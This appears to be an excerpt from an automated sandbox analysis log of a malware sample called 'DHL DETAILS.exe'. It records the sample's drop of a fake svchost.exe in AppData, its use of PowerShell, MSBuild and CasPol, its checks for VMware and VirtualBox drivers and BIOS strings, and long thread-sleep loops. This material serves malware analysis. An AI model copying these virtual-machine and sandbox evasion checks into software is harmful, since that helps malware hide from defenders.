Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe	Memory allocated: 2F00000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Memory allocated: 2510000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Memory allocated: 2BD0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Memory allocated: 2510000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Roaming\svchost.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier
Source: C:\Users\user\AppData\Roaming\svchost.exe	File opened / queried: C:\WINDOWS\system32\drivers\vmmouse.sys
Source: C:\Users\user\AppData\Roaming\svchost.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\disk\Enum name: 0
Source: C:\Users\user\AppData\Roaming\svchost.exe	File opened / queried: C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: C:\Users\user\AppData\Roaming\svchost.exe	File opened / queried: C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: C:\Users\user\AppData\Roaming\svchost.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Roaming\svchost.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Roaming\svchost.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Desktop\DHL DETAILS.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\DHL DETAILS.exe	Window / User API: threadDelayed 4425	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Window / User API: threadDelayed 1050	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Window / User API: threadDelayed 1099	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Window / User API: threadDelayed 5790
Source: C:\Users\user\AppData\Roaming\svchost.exe	Window / User API: threadDelayed 2332
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2033
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 501
Source: C:\Users\user\AppData\Roaming\svchost.exe	Window / User API: threadDelayed 1452
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1536
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1170

Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584	Thread sleep time: -99764s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584	Thread sleep time: -99544s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584	Thread sleep time: -99406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584	Thread sleep time: -99293s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584	Thread sleep time: -99187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584	Thread sleep time: -99078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584	Thread sleep time: -98965s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584	Thread sleep time: -98763s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584	Thread sleep time: -98655s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584	Thread sleep time: -98546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584	Thread sleep time: -98437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584	Thread sleep time: -98325s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584	Thread sleep time: -98202s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584	Thread sleep time: -98091s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584	Thread sleep time: -97980s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584	Thread sleep time: -97866s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584	Thread sleep time: -97749s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2800	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -99704s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -99593s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -99375s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -99098s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -98905s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -98737s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -98472s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -98328s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -97515s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -97166s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -97031s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -96899s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -96791s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -95453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -94906s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -91515s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -90755s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -90625s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -90497s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -90387s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -90259s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -90136s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -89791s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -76875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -73312s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -70937s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -67375s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -65000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -64718s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -62625s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -55468s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -53125s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -48375s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -46000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -43625s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -41329s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -38954s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -36579s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -34204s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -31829s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448	Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43472	Thread sleep count: 5790 > 30
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448	Thread sleep time: -99872s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448	Thread sleep time: -99765s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448	Thread sleep time: -99646s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448	Thread sleep time: -99525s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448	Thread sleep time: -99405s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448	Thread sleep time: -99295s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448	Thread sleep time: -99184s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448	Thread sleep time: -99068s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448	Thread sleep time: -98938s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448	Thread sleep time: -98822s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448	Thread sleep time: -98717s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448	Thread sleep time: -98608s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448	Thread sleep time: -98467s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448	Thread sleep time: -98354s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448	Thread sleep time: -98156s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448	Thread sleep time: -97995s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448	Thread sleep time: -97888s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448	Thread sleep time: -97768s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448	Thread sleep time: -97640s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448	Thread sleep time: -97500s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448	Thread sleep time: -97359s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448	Thread sleep time: -97218s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448	Thread sleep time: -97082s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43456	Thread sleep count: 90 > 30
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448	Thread sleep time: -96960s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448	Thread sleep time: -96828s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448	Thread sleep time: -96716s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448	Thread sleep time: -96543s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24312	Thread sleep count: 2332 > 30
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -99843s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -99714s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -99606s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -99485s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -99370s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -99223s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -99093s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -98961s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -98790s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -98667s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -98515s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -98384s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -98274s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -98119s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -97965s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -97738s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -97531s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -97375s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -96814s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -96623s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -94781s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -94594s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -94441s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -94234s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -94021s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -93844s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -93730s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -93604s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -93498s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -93383s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -93047s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -92888s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -92701s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -92469s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -92328s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -92166s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -92000s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -91867s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -91672s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -91531s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -91391s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -91234s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -91068s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -90931s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -90746s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -90624s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -90463s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -90334s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -90156s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -89955s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -89817s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -89688s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -89536s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -89398s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -89209s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -89039s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -88766s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -88618s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -88468s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -88219s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -88070s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -87947s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -87759s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -87531s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -87414s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -87234s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -87000s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -86859s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -86719s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -86406s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -85703s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -85216s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -85090s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -84906s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -84749s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -84172s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -84009s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -83859s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -83688s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -83557s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -83410s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -83266s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -83078s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -82945s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -82818s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -82641s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -82453s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -82277s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -82094s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -81920s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -81781s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -81617s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -81469s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -81340s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -81000s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -80819s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -80609s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -80428s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -80234s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -79797s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -79094s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -77266s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -76985s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -76766s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -76572s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -76328s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -76106s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -75719s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -75500s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -75281s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -75150s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -75000s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -74839s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -74729s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -74578s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -74422s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -74263s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -74125s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -73994s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -73844s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -73541s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -73344s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -73184s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -73000s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -72838s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -72547s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -71781s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -71313s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -71152s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -70922s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -70700s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -70516s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -70297s >= -30000s
